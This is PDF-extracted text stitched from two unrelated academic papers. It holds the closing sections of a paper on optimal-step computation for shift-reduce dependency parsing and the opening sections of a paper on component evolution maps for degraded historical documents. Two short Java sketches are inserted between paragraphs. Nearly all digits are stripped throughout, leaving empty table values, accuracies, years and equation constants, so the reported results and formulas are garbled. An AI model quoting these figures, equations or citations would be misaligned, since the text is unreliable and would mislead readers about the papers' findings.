λ(i,j) to be true if and only if there is an ` < i such that (a`,aj) ∈ tg or (aj,a`) ∈ tg. if (aj,ai) /∈ tg and λ(i,j) is false, then the highest score attain- able from a configuration (a · · ·ai− aj,β,∅) is no higher than the highest score attainable from (a · · ·ai− ai,β,∅), or, if aj has a parent bj′, from (a · · ·aibj′,β′,∅), for appropriate suffix β′ of β. this means that in order to calculate score(i,j,q) we do not need to calculate score(i− ,j,q) in this case. secondly, if (aj,ai) /∈ tg and λ(i,j) is true, and if there is `′ < i such that (a`′,ai) ∈ tg or (ai,a`′) ∈ tg, then there are no edges between aj and ai′ for any i′ with `′ < i′ < i, because of projectivity of tg. we therefore do not need to calculate score(i′,j,q) for such values of i′ in order to find the computation with the highest score. this is illustrated in figure . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april let us define κ(i) to be the smallest `′ such that (a`′,ai) ∈ tg or (ai,a`′) ∈ tg, or i − if there is no such `′. in the definition of score, we may now replace w(j,i) ⊗score(i− ,j,q) by: [if w(j,i) = then ⊗score(i− ,j,q) else if w(j,i) = ∧λ(i,j) then score(κ(i),j,q) else −∞] similarly, we define λ′(i,j) to be true if and only if there is an ` < i such that (a`,bj′) ∈ tg or (bj′,a`) ∈ tg for some j′ with r(j′) = r(j). in the definition of score′, we may now replace score′(i− ,j) by: [if λ′(i,j) then score′(κ(i),j) else −∞] thereby the algorithm becomes linear-time, because the number of values score(i,j,q) and score′(i,j) that are calculated for any i is now linear. to see this, consider that for any i, score(i,j,q) would be calculated only if j = i + , if (ai,aj) ∈ tg or (aj,ai) ∈ tg, if (aj,ai+ ) ∈ tg, or if j is smallest such that there is ` < i with (a`,aj) ∈ tg or (aj,a`) ∈ tg. 
similarly, score′(i,j) would be calculated only if score(i,j′,q) would be calculated and (bj,aj′) ∈ tg, if (bj,ai+ ) ∈ tg, or if j is smallest such that there is ` ≤ i with (a`,bj′) ∈ tg or (bj′,a`) ∈ tg for some j′ such that bj′ is an ancestor of bj in the same component.

towards constant time per calculation

a typical application would calculate the optimal step for several or even all configurations within one computation. between one configuration and the next, the stack differs at most in the two rightmost elements and the remaining input differs at most in that it loses its leftmost element. therefore, all but a constant number of values of score(i,j,q) and score′(i,j) can be reused, to make the time complexity closer to constant time for each calculation of the optimal step. the practical relevance of this is limited however if one would typically reload the data structures containing the relevant values, which are of linear size. hence we have not pursued this further.

experiments

our experiments were run on a laptop with an intel i - u processor ( cores, . ghz) with gb of ram. the implementation language is java, with dl4j for the classifier, realized as a neural network with a single layer of hidden nodes. training is with batch size , and epochs. features are the (gold) parts of speech and length- word2vec representations of the word forms of the top-most three stack elements, as well as of the left-most three elements of the remaining input, and the left-most and right-most dependency relations in the top-most two stack elements.

https://deeplearning4j.org/
https://universaldependencies.org/

figure: geometric mean of the number of optimal projectivized trees against sentence length.

optimal projectivization

we need to projectivize our training corpus for the experiments in section . , using the algorithm described at the end of section . as we are not aware of literature reporting experiments with optimal projectivization, we briefly describe our findings here. projectivizing all the training sets in universal dependencies v . took sec in total, or . ms per tree. as mentioned earlier, there may be multiple projectivized trees that are optimal in terms of accuracy, for a single gold tree. we are not aware of meaningful criteria that tell us how to choose any particular one of them, and for our experiments in section . we have chosen an arbitrary one. it is conceivable, however, that the choices of the projectivized trees would affect the accuracy of a parser trained on them. figure illustrates the degree of "choice" when projectivizing trees. we consider two languages that are known to differ widely in the prevalence of non-projectivity, namely ancient greek (proiel) and japanese (bccwj), and we consider one more language, german (gsd), that falls in between (straka et al., ). as can be expected, the degree of choice grows roughly exponentially in sentence length.

        pseudo   optimal
grc     .        .
de      .        .
ja      .        .
table: accuracy (las or uas, which here are identical) of pseudo-projectivization and of optimal projectivization.

table shows that pseudo-projectivization is non-optimal. we realized pseudo-projectivization using maltparser . . . .
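for concreteness, the accuracy reported in the table can be read as a plain attachment score between a projectivized tree and the gold tree. the java sketch below assumes both trees are given as head arrays; it is an illustration of the metric, not code from the paper.

// hedged sketch, not code from the paper: reading the accuracy in the table above
// as plain attachment score between a projectivized tree and the gold tree, both
// given as head arrays (las and uas coincide when projectivization leaves labels
// untouched, which is presumably why the two are identical here).
public final class AttachmentScore {

    public static double uas(int[] goldHead, int[] treeHead) {
        if (goldHead.length != treeHead.length || goldHead.length == 0)
            throw new IllegalArgumentException("trees must be non-empty and of equal length");
        int correct = 0;
        for (int i = 0; i < goldHead.length; i++)
            if (goldHead[i] == treeHead[i]) correct++;   // head attached as in the gold tree
        return (double) correct / goldHead.length;
    }

    public static void main(String[] args) {
        int[] gold = {-1, 0, 1, 1, 0};
        int[] proj = {-1, 0, 1, 0, 0};   // one attachment moved by projectivization
        System.out.println(uas(gold, proj));   // prints 0.8
    }
}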
computing the optimal step

to investigate the run-time behavior of the algorithms, we trained our shift-reduce dependency parser on the german training corpus, after it was projectivized as in section . . in a second pass over the same corpus, the parser followed the steps returned by the trained classifier. for each configuration that was obtained in this way, the running time was recorded of calculating the optimal step, with the non-strict left-before-right strategy. for each configuration, it was verified that the calculated scores, for shift, reduce left, and reduce right, were the same between the three algorithms from sections , , and . the two-pass design was inspired by choi and palmer ( ). we chose this design, rather than online learning, as we found it easiest to implement. goldberg and nivre ( ) discuss the relation between multi-pass and online learning approaches.

as figure shows, the running times of the algorithms from sections and grow slowly as the summed length of stack and remaining input grows; note the logarithmic scale. the improvement of the linear-time algorithm over the quadratic-time algorithm is perhaps less than one may expect. this is because the calculation of the critical nodes and the construction of the necessary tables, such as p, p′, and r, is considerable compared to the costs of the memoized recursive calls of score and score′.

http://www.maltparser.org/

figure: mean running time per step (milliseconds) against length of input, for projectivized and unprojectivized trees.
figure: mean k + m′ against k + m.

both these algorithms contrast with the algorithm from section , applied on projectivized trees as above (hence tagged proj in figure ), and with the remaining input simplified to just its critical nodes. for k + m = , the cubic-time algorithm is slower than the linear-time algorithm by a factor of about . nonetheless, we find that the cubic-time algorithm is practically relevant, even for long sentences. the decreases at roughly k + m = , which are most visible for section (proj), are explained by the fact that the running time is primarily determined by k + m′, where m′ is the number of critical nodes. because k + m is bounded by the sentence length and the stack height k tends to be much less than the sentence length, high values of k + m tend to result from the length m of the remaining input being large, which in turn implies that there will be more non-critical nodes that are removed before the most time-consuming part of the analysis is entered. this is confirmed by figure .

( ) ( ) ( ) ( ) ( )
las uas
subset all subset all all
sec. sec. sec.
de, % . . . . . , . . . . .
da, % . . . . . , . . . . .
eu, % . . . . . , . . . . .
el, % . . . . . , . . . . .
cu, % . . . . . , . . . . .
got, % . . . . . , . . . . .
hu, % . . . . . , . . . . .
table: accuracies, with percentage of trees that are non-projective, and number of tokens. only gold computations are considered in a single pass ( , ) or there is a second pass as well ( , , ). the first pass is on the subset of projective trees ( , ) or on all trees after optimal projectivization ( , , ). the second pass is on projectivized trees ( , ) or on unprojectivized trees ( ).

the main advantage of the cubic-time algorithm is that it is also applicable if the training corpus has not been projectivized.
to explore this we have run this algorithm on the same corpus again, but now without projectivization in the second pass (for training the classifier in the first pass, projec- tivization was done as before). in this case, we can no longer remove non-critical nodes (without it affecting correctness), and now the curve is mono- tone increasing, as shown by section (unproj) in figure . nevertheless, with mean running times below . sec even for input longer than tokens, this algorithm is practically relevant. . accuracy if a corpus is large enough for the parameters of a classifier to be reliably estimated, or if the vast majority of trees is projective, then accuracy is not likely to be much affected by the work in this paper. we therefore also consider six languages that have some of the smallest corpora in ud v . in combination with a relatively large proportion of non-projective trees: danish, basque, greek, old church slanovic, gothic, and hungarian. for these languages, table shows that accuracy is generally higher if training can benefit from all trees. in a few cases, it appears to be slightly better to train directly on non-projective trees rather than on optimally projectivized trees. conclusions we have presented the first algorithm to calculate the optimal step for shift-reduce dependency pars- ing that is applicable on non-projective training corpora. perhaps even more innovative than its functionality is its modular architecture, which im- plies that the same is possible for related kinds of parsing, as long as the set of allowable transitions can be described in terms of a split context-free grammar. the application of the framework to, among others, arc-eager dependency parsing is to be reported elsewhere. we have also shown that calculation of the optimal step is possible in linear time if the train- ing corpus is projective. this is the first time this has been shown for a form of projective, deter- ministic dependency parsing that does not have the property of arc-decomposibility. acknowledgments the author wishes to thank the reviewers for comments and suggestions, which led to substan- tial improvements. references lauriane aufrant, guillaume wisniewski, and françois yvon. . exploiting dynamic ora- cles to train projective dependency parsers on non-projective trees. in conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume , pages – . new orleans, la. jinho d. choi and martha palmer. . getting the most out of transition-based dependency pars- ing. in th annual meeting of the association for computational linguistics, proceedings of the conference, pages – . portland, or. jason eisner. . bilexical grammars and their cubic-time parsing algorithms. in harry bunt and anton nijholt, editors, advances in probabilis- tic and other parsing technologies, chapter , pages – . kluwer academic publishers. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april jason eisner and giorgio satta. . efficient parsing for bilexical context-free grammars and head automaton grammars. in th annual meeting of the association for computational linguistics, proceedings of the conference, pages – . maryland. daniel fernández-gonzález and carlos gómez- rodŕıguez. a. a dynamic oracle for linear- time -planar dependency parsing. in conference of the north american chapter of the asso- ciation for computational linguistics: human lan- guage technologies, volume , pages – . 
new orleans, la. daniel fernández-gonzález and carlos gómez- rodrı́guez. b. non-projective dependency parsing with non-local transitions. in con- ference of the north american chapter of the association for computational linguistics: human language technologies, volume , pages – . new orleans, la. norman fraser. . parsing and dependency grammar. ucl working papers in linguistics, : – . yoav goldberg and joakim nivre. . a dy- namic oracle for arc-eager dependency parsing. in the th international conference on com- putational linguistics, pages – . mumbai. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, : – . yoav goldberg, francesco sartorio, and giorgio satta. . a tabular method for dynamic ora- cles in transition-based parsing. transactions of the association for computational linguistics, : – . carlos gómez-rodŕıguez, john carroll, and david weir. . a deductive approach to depen- dency parsing. in th annual meeting of the association for computational linguistics: hu- man language technologies, pages – . columbus, oh. carlos gómez-rodrı́guez and daniel fernández- gonzález. . an efficient dynamic oracle for unrestricted non-projective parsing. in rd annual meeting of the association for compu- tational linguistics and th international joint conference on natural language processing, volume , pages – . beijing. carlos gómez-rodrı́guez, francesco sartorio, and giorgio satta. . a polynomial-time dynamic oracle for non-projective dependency parsing. in conference on empirical methods in natural language processing, proceedings of the conference, pages – . doha. liang huang and kenji sagae. . dynamic pro- gramming for linear-time incremental parsing. in proceedings of the th annual meeting of the association for computational linguistics, pages – . uppsala. mark johnson. . transforming projective bilexical dependency grammars into efficiently- parsable cfgs with unfold-fold. in th annual meeting of the association for com- putational linguistics, proceedings of the con- ference, pages – . prague. sylvain kahane, alexis nasr, and owen rambow. . pseudo-projectivity, a polynomially pars- able non-projective dependency grammar. in th annual meeting of the association for computational linguistics and th interna- tional conference on computational linguis- tics, volume , pages – . montreal. martin kay. . guides and oracles for linear- time parsing. in proceedings of the sixth international workshop on parsing technolo- gies, pages – . trento. marco kuhlmann, carlos gómez-rodrı́guez, and giorgio satta. . dynamic programming algorithms for transition-based dependency pars- ers. in th annual meeting of the association for computational linguistics, proceedings of the conference, pages – . portland, or. miryam de lhoneux, sara stymne, and joakim nivre. . arc-hybrid non-projective depen- dency parsing with a static-dynamic oracle. in th international conference on parsing technologies, pages – . pisa. alexis nasr. . a formalism and a parser for lexicalised dependency grammars. in fourth international workshop on parsing technolo- gies, pages – . prague and karlovy vary. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april joakim nivre. . algorithms for deterministic incremental dependency parsing. computa- tional linguistics, ( ): – . joakim nivre, johan hall, and jens nilsson. . memory-based dependency parsing. 
in proceedings of the eighth conference on computational natural language learning, pages – . boston, ma. joakim nivre and jens nilsson. . pseudo- projective dependency parsing. in rd annual meeting of the association for computational linguistics, proceedings of the conference, pages – . ann arbor, mi. peng qi and christopher d. manning. . arc-swift: a novel transition system for depen- dency parsing. in th annual meeting of the association for computational linguistics, proceedings of the conference, volume , pages – . vancouver. milan straka, jan hajič, jana straková, and jan hajič, jr. . parsing universal dependency treebanks using neural networks and search- based oracle. in proceedings of the fourteenth international workshop on treebanks and linguistic theories, pages – . warsaw. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in th international workshop on parsing technologies, pages – . loria, nancy. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction preliminaries tabular dependency parsing o(n )- . time algorithm o(n - . ) time algorithm o(n)- . time algorithm towards constant time per calculation experiments optimal projectivization computing the optimal step accuracy conclusions evolution maps and applications submitted april accepted november published january corresponding author ofer biller, billero@cs.bgu.ac.il academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright biller et al. distributed under creative commons cc-by . open access evolution maps and applications ofer biller , irina rabaev , klara kedem , its’hak dinstein and jihad j. el-sana department of computer science, ben-guion university of the negev, beer-sheva, israel electrical and computer engineering department, ben-guion university of the negev, beer-sheva, israel abstract common tasks in document analysis, such as binarization, line extraction etc., are still considered difficult for highly degraded text documents. having reliable fundamental information regarding the characters of the document, such as the distribution of character dimensions and stroke width, can significantly improve the performance of these tasks. we introduce a novel perspective of the image data which maps the evolution of connected components along the change in gray scale threshold. the maps reveal significant information about the sets of elements in the document, such as characters, noise, stains, and words. the information is further employed to improve state of the art binarization algorithm, and achieve automat- ically character size estimation, line extraction, stroke width estimation, and feature distribution analysis, all of which are hard tasks for highly degraded documents. subjects computer vision, digital libraries keywords text document analysis, historical documents, degraded documents, connected component analysis introduction in recent years there has been a growing effort to digitize historical documents. due to advanced technology, a high quality acquisition of large collections of documents became practical, saving them from physical decay. many algorithms are being developed in order to extract information out of these documents, which are too numerous to analyze manually. however, some of these documents are severely degraded, and therefore do not provide acceptable performance when processed using common methods. 
in our work, we provide a novel perspective on text documents which reveals key information about the various elements of the document such as letters, connected letters, noise, and stains. the extracted information can be used by higher level algorithms to significantly improve their performance. various algorithms such as binarization, segmentation, word spotting, and recognition often require preliminary information such as character dimensions, stroke width, and noise characteristics of the input document. when dealing with severely degraded documents, this information is essential but is hard to obtain automatically. less degraded documents parameters, such as stroke width and character size, are often obtained with relative accuracy by using a binarized version of the document (roy et al., ; wen & ding, ; raju, pati & ramakrishnan, a). the binarization of degraded documents, however, is not reliable as it may introduce how to cite this article biller et al. ( ), evolution maps and applications. peerj comput. sci. :e ; doi . /peerj-cs. mailto:billero@cs.bgu.ac.il https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. noise, falsely merged components, and other artifacts. for many algorithms, information regarding character dimensions is often expected to be provided by the user or determined in an ad-hoc manner (new et al., ; bar-yosef et al., ). our method copes with severe degradations and non-uniform backgrounds. in this paper, we introduce the component evolution maps, and demonstrate some of their applications. we use these maps to estimate letter dimensions and stroke width in degraded documents. we then utilize this information to improve state-of-the-art bina- rization, line segmentation, and characterizing feature behavior in a document collection. for a given property of the connected components in a document, the evolution maps demonstrate the evolution of the histogram of the property, along with the change in the intensity threshold. to simplify the discussion, we start explaining the evolution map of the component’s width property. for example, fig. shows the distribution of the width of the connected components for each possible intensity threshold. the y-axis represents the intensity level, the x-axis represents width, and the z-axis (color) represents the density of the components for each width in the given threshold: warm (red, orange, yellow, etc.)—high density, cold (blue, cyan, etc.)—low (this is the color coding of all the maps depicted in the figures in the paper). since the map represents a text document, we expect to see high density in the range of character width and within the range of intensity thresholds that separates the characters from the background. the histogram in fig. shows a blob centered around a width of pixels, ranging over gray levels approximately from to . this blob represents the characters in the document. the noise, on the other hand, concentrates along the y-axis, and is depicted as a large number of low width connected components in a wide range of gray scale thresholds. in our research we deal with severely degraded documents, where state-of-the-art document analysis algorithms, such as binarization and line extraction, provide poor results. 
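to make this picture concrete, a width evolution map of the kind just described can be assembled by sweeping the threshold and labelling connected components at every level. the java sketch below is a hedged illustration only; the foreground convention (pixels darker than the threshold), 4-connectivity, bounding-box width, and all names are assumptions rather than details taken from this paper.

import java.util.*;

// hedged sketch, not code from the paper: assembling a width evolution map by
// sweeping the gray-scale threshold. assumptions made here for illustration:
// gray[y][x] holds 0..255 intensities, pixels darker than the threshold are
// foreground, components are 4-connected, and width is the bounding-box width;
// area weighting and smoothing, as used by the authors, are omitted.
public final class WidthEvolutionMap {

    // map[g][w] = number of connected components of width w when thresholding at g
    public static int[][] build(int[][] gray, int maxWidth) {
        int h = gray.length, w = gray[0].length;
        int[][] map = new int[256][maxWidth + 1];
        for (int g = 0; g < 256; g++) {
            boolean[][] seen = new boolean[h][w];
            for (int y = 0; y < h; y++)
                for (int x = 0; x < w; x++) {
                    if (seen[y][x] || gray[y][x] >= g) continue;   // background or already labelled
                    int minX = x, maxX = x;
                    Deque<int[]> todo = new ArrayDeque<>();
                    todo.push(new int[]{y, x});
                    seen[y][x] = true;
                    while (!todo.isEmpty()) {                      // flood-fill one component
                        int[] px = todo.pop();
                        minX = Math.min(minX, px[1]);
                        maxX = Math.max(maxX, px[1]);
                        int[][] nbr = {{px[0]-1,px[1]},{px[0]+1,px[1]},{px[0],px[1]-1},{px[0],px[1]+1}};
                        for (int[] q : nbr)
                            if (q[0] >= 0 && q[0] < h && q[1] >= 0 && q[1] < w
                                    && !seen[q[0]][q[1]] && gray[q[0]][q[1]] < g) {
                                seen[q[0]][q[1]] = true;
                                todo.push(q);
                            }
                    }
                    map[g][Math.min(maxX - minX + 1, maxWidth)]++; // one component, one cell
                }
        }
        return map;
    }
}

accumulating component area instead of a count in the same loop yields the area-weighted variant discussed later in the paper.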
a good example of such text documents are those from the cairo genizah. the cairo genizah is a collection of documents, most of them in handwritten hebrew square letters, which where hidden in an attic of a synagogue in cairo, egypt for several hundreds of years. the genizah collection contains hundreds of thousands of documents dated starting from the ninth century. the documents are characterized by different handwriting styles, document and letter sizes, and materials. most documents are only textual, each document contains a single writing style with no titles, and many of them are severely degraded. the main motivation in this research is to provide a solid starting point for processing severely degraded historical documents. in the rest of this paper we briefly overview related work, then describe in detail the component evolution maps, their construction and initial analysis (‘evolution maps’). in ‘applications’ we demonstrate several applications for component evolution maps. finally, in ‘summary,’ we conclude our work and draw directions for future research. related work connected component analysis has attracted the interest of researchers, and intensive research was performed on document layout segmentation and text separation for biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a document image, and the distribution of connected components along their width prop- erty (x-axis), for each possible gray scale threshold (y-axis). the z-axis is expressed by color where warm (cold) colors represent high (low) density of components. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. binarized document images (jain & zhong, ; raju, pati & ramakrishnan, b; zagoris & papamarko, ; bukhari et al., ). pikaz & averbuch ( ) selected a threshold for text document by scanning the entire gray scale range, thresholding the image with each value, looking for the widest sub range of gray scale for which the number of the connected components remains stable. this method may be viewed as a special case of our approach. the component tree is a graph representation computed from the cross-section decomposition of the gray levels of the image (mosorov & kowalski, ), and uses connected components of cross-sections at gray level of the image to assemble different perspectives of the image data. the component tree applies operators on a single component level for image segmentation (de carvalho et al., ) and for document binarization (naegel & wendling, ). similarly, the maximally stable extremal regions (mser) descriptor (pajdla et al., ) finds extremal regions which maximize stability over threshold change, and is used mostly for object recognition. most of these works analyze the change of thresholds in order to achieve local information such as local adaptive binarization, segmenting or locating objects in an image. in our work, we map connected component information for a range of different thresholds over the whole document in order to extract global information about the document and its elements. evolution maps we offer a novel perspective of the image data which reflects the evolution of connected components along the change in gray scale threshold. we term it as component evolution maps (cem). cem brings to the surface underlying information about the sets of elements (e.g., letters, noise, connected letters) in the document image. 
below we discuss in detail the construction of the evolution maps followed by their analysis. definition of the evolution map the evolution map is a function of the intensity (i) and a property (p) of the connected components of the image into the occurrence level of this property in the image, i.e., map : i × p −→ r, where i is the intensity, p is an image property, and r is the occurrence (detailed below). for example, the width cem, map(g,w), is the number of connected components of width w in pixels, when thresholding the image at intensity g. to simplify the discussion, we refer in this section only to the width cem. the cem provides an intuitive visualization tool to analyze the distribution of an image property. figure represents the width cem for a text document image, where ‘hot’ colors represent high density of components. the horizontal cross-section at gray scale value g (y-axis) represents the histogram of the components’ widths in the image binarized using g as a threshold. figure shows three cross-sections at different intensity thresholds, and the corresponding binary images. in fig. we illustrate a cross-section as histogram of component width for a specific threshold, and the corresponding components in the document for two ranges of width (see the squares on the graph). biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure horizontal cross-section of the width cem and the corresponding binary images. construction of the evolution map we construct the evolution map in a straightforward manner by thresholding the image over gray levels, and counting the number of resulting connected components for each width in the binary image. since noise usually produces a vast number of small components and skews the histogram, we accumulate the relative total area of the components, which is defined as the area of the components normalized by the size of the whole image. this value is less sensitive to noise than component count, as shown in fig. . as seen, the red blob on the top illustration emphasizes the noise, and the bottom illustration highlights the width of the sought elements. we store both the values count and the relative total area, and use each of them in different applications as detailed below. we smooth the cem using a d gaussian kernel to reduce the influence of local irregularities. constructing the cem, for one or few properties, is relatively straight forward and fast. for example, computing the cems of properties for a document of resolution , × , took about . s on a standard desktop. analysis of the cem some sets of elements in the gray scale documents (noise, characters, connected characters, etc.) have values of the mapped property which are distributed within a given range. sets which are dominant in the document will form a blob of local maximum on the map. the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a horizontal cross-section of the densities in the width cem at one gray level value. the squares on the graph depict the most popular widths for this intensity value. the images of components corresponding to the squares are pointed to by the arrows. characteristics of the local maximum and its surroundings describe attributes of the set of objects. 
due to the statistical nature of the map, it tends to be robust against various defects of the image such as blurriness, local degradations and deformations. figure shows a document with its width cem. images a–e show the set of elements in the original image corresponding to the blobs a–e in the cem. blob a represents a set of noise stains in the document, which appear on relatively high range of threshold values and low width values (indicating small components). the dominance of blob b is supported by the existence of single character elements that occupy a substantial area of the image. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure (a) displays the count of components per threshold and width, and (b) shows the relative total area of components per threshold and width. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a document image with its components according to the width evolution map. the images (a, b, c, d, e), display the components represented by each of the blobs, marked on the map by (a, b, c, d, e). the blobs c, d, and e, are at high width values and represent objects of two, three, and four connected letters, respectively. to extract the information found in the cem, we look for the main blobs in the map, and model each of them by an anisotropic gaussian. first, to determine the top blob centroids, we use a sweeping plane that moves downward along the z-axis. as the plane descends, it encounters the peaks of the blobs, one by one. neighboring blobs expand until they touch each other, or reach a low value below a predefined threshold. we use the data of the peaks and their immediate neighborhood to create an anisotropic gaussian model for each blob. we fit a quadratic surface to the log of the data from the map using the least squares method. we obtain the gaussian characteristics using the coefficients of the fitted quadratic surface. given a blob on the map and it’s gaussian modeling, we can obtain an estimation for the distribution of the property values for the elements represented by the blob. in the width example, we receive distribution of the width of elements represented by each blob. in order to receive some hard limits on the values of the property values for the elements in the group, we should apply some threshold on the given distribution (e.g., times the standard deviation). biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the original width cem (a), and its modeling by anisotropic gaussians (b). gaussian modeling was validated as suitable for the cem blobs by examining the data and verifying that the blob distribution is very close to normal distribution. using gaussians to model the blobs provides a concise and simplified representation, and handles blob intersection appropriately. it also provides the probability that an element belongs to the set represented by a certain blob. using gaussian mixture model was examined as an alternative option, but was found this to be less effective since the mixture model, using expectation maximization, tends to capture small components, while we prefer to ignore small components and model the leading salient blobs more accurately. figure shows a width cem and its simplified modeling using the topmost gaussians. 
applications in this section we demonstrate some applications of cems for several document analysis tasks. we robustly estimate the character dimensions and stroke width on degraded documents. this information is then used by many document analysis algorithms to improve their performance and reduce the need for manual adjustments of predefined parameters. we demonstrate utilization of this information to improve state of the art binarization method and simplify line segmentation of degraded documents. finally, we show how the cems is used for exploring feature behavior in text documents. in order to evaluate the performance of these tasks we had to manually generate ground truth for each task (character dimensions, line segmentation, and stroke width). for each task, we randomly selected a subset of the documents from the collection and generated the ground truth relevant for the task. estimation of character dimensions one of the salient elements in a cem of a text document is the blob which represents the documents’ characters. to determine the blob that represents the document’s characters, we consider the top blobs and grade them according to the following features. we define biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the components of a blob b as as the set of connected components corresponding to the points (g,w) of b, and the cardinality of the blob b as the number of connected components represented by b. let p be the percentage of the image area occupied by all the components in the blob b, and let n denote the total number of components in b. equation ( ) formulates the score of of the blob b. score = (a · p) × + exp(−c · (n − c )) . ( ) the exponential term in the denominator, parametrized by the given constants c and c , suppresses the score of blobs with small number of components. the blobs with the highest score from both width and height cems represent the width and height of the letters in the input image. we also take into account the agreement level between the selected blobs from the width and the height cems– the two blobs should have a similar mean and standard deviation on the y-axis (intensity) projection. the same experiment was conducted also for other properties, such as the component’s diagonal and the projection of the component on its main principal axis. these maps provide correct estimates of the character dimensions in most cases, but are less accurate than the estimate obtained by width and height evolution maps. we applied our method on a collection of digitized historical documents from the cairo genizah. we ran our algorithm on a set of hundred documents (selected randomly) with various degradation levels, resolutions and character dimensions. we created width and height cems for each document, and estimated the width and height ranges of the characters in each document. for these documents, we have created ground truth (using biller et al., ) which includes bounding boxes of the letters. to measure the accuracy of our results, we calculated the precision, recall, and f-measure of our estimate with respect to the ground truth. figure shows the width cem for a specific document. displayed in black over it is a histogram of the ground truth widths. our estimate of character width is marked by a white rectangle. we calculated the recall as the percentage of letters from the ground truth which fit in our width estimate. 
the precision is calculated as the ratio between the overlap of our width estimate with the ground truth and the range of our width estimate. our method achieves accuracy of . % (f-measure) with respect to the provided ground truth. improving binarization methods in this section, we demonstrate improving the results of a binarization algorithm by using cem to estimate character dimension. we use the winning algorithm in the h-dibco- binarization contest (pratikakis, gatos & ntirogiannis, ) proposed by bar-yosef et al. ( ). this binarization algorithm is based on the sliding window approach. the window size is configurable, and the authors recommend it to be around one and a half times the letter size. first we ran the binarization algorithm with a default window size (fig. a). then, we ran the same binarization algorithm using a window size of one and a half times the maximum of the width and height of the characters in the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure utilizing our estimation to improve binarization algorithm. (a) binarization using default window size. (b) binarization with optimized window size using the output of the cem. (c) result after filtering out-of-range components, using the estimate of character dimension, given by the cem. figure the width cem of a document’s image. displayed in black on the cem is the histogram of the ground truth of widths for the letters (the height of the black line represents the count). the white rectangle shows the estimate of the width range of the characters, made by our algorithm. biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure line detection results of the algorithm. the elements that belong to the same line have the same color. the segmentation borders are shown as blue curves. document obtained by cem (fig. b). as an additional improvement of the binarization, we filter out all components of the binarized image which substantially exceed the range of character dimensions (fig. c). we applied our method on seventy degraded documents from the genizah collection, and observed a substantial improvement in the quality of the results compared with the bar-yosef algorithm with default parameters. to quantify the improvement we randomly selected five documents, manually generated a ground truth of binarization for each, and measured the performance of the two binarization methods against the ground truth. the proposed method achieved an average f-measure of . % (with average percision of . % and average recall of . %) while the original algorithm achived . % (with average percision of . % and average recall of . %). line segmentation of degraded documents in this section, we demonstrate utilizing cem for text line detection in gray scale images of highly degraded historical documents. using the information obtained from the cem, we identify components which are likely to be characters of the documents. we take into account their width, height, and range of thresholds in which they are received. the set of identified elements does not have to include all the characters present in the document. nevertheless, the identified elements represent most of the characters in the document, which allows detecting text lines in the degraded document, as described below. the detected potential characters are accumulated into lines using a sweeping line approach. 
a vertical sweeping line moves across the image in the direction of writing. when the sweeping line encounters an element, the algorithm determines whether to assign this element to one of the already discovered text lines, or to initiate a new line. full details of the algorithm can be found in rabaev et al. ( ). the final result of the text line detection is illustrated in fig. . elements that belong to the same line have the same color. the segmentation borders are shown in blue. to evaluate the performance of the algorithm, we employed the evaluation strategy used in the icdar handwriting segmentation contest (gatos, stamatopoulos & louloudis, ). two values, detection rate (dr) and recognition accuracy (ra), are calculated. the detection rate and recognition accuracy are based on the number of matches between the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. line regions detected by the algorithm and the line regions in the ground truth, and are calculated as follows: dr = o o n , ra = o o m , where n and m are the number of text lines in the ground truth and the number of text lines detected by the algorithm, respectively, and o o is the number of one-to-one matches. a measure that combines detection rate and recognition accuracy is the performance metric fm: fm = × dr × ra dr + ra . the algorithm was applied to extremely degraded document from cairo genizah collection. the results averaged over these documents are dr = . , ra = . , and fm = . . taking into consideration that the tested documents are torn, stained and highly damaged, the results are very encouraging. in addition, the presented method does not require any preprocessing step, e.g., noise reduction or text zone location. to test the applicability of the proposed approach to non hebrew documents, we used saint gall and parzival databases. the saint gall database (presented in fischer et al. ( ) and garz et al. ( )) contains pages of a latin manuscript from the th century written by single writer. the parzival database, described in fischer et al. ( ), contains pages of a german manuscript from the th century written by three writers. the results of applying our algorithms are dr = . , ra = . , and fm = . on saint gall database, and dr = . , ra = . , and fm = . on parzival database. (garz et al. ( ) used slightly dierent evaluation criteria. without getting into details, our result for the saint gall dataset using their evaluation criteria is line accuracy . , while the result of garz et al. is . . as can be seen, the results are very similar). in addition, we have applied the algorithm of asi, saabni & el-sana ( ) on the cairo genizah dataset. while the algorithm in asi, saabni & el-sana ( ) had been reported to achieve excellent results for documents of 